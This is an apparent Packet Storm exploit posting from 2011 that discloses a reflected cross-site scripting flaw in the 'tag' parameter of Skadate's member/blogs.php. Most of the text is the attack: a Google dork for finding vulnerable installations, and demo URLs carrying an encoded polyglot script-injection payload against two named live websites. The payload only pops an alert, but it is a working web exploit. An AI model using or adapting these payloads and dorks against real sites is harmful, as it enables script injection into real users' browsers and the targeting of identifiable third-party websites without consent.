Skadate Blogs Cross Site Scripting

2011-09-08T00:00:00
ID PACKETSTORM:104883
Type packetstorm
Reporter Sony
Modified 2011-09-08T00:00:00

Description

                                        
                                            `# Exploit Title: Skadate Blogs Cross Site Scripting  
# Date: 7.08.2011  
# Author: Sony  
# Software Link: http://www.skadate.com/  
# Google Dorks: member/blogs.php?tag= povered by skadate  
# Blog : http://st2tea.blogspot.com  
..................................................................  
  
Demo:  
  
  
http://www.latinamericanface.com/member/blogs.php?tag=blog+[XSS]  
  
http://www.latinamericanface.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://www.curvez.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
`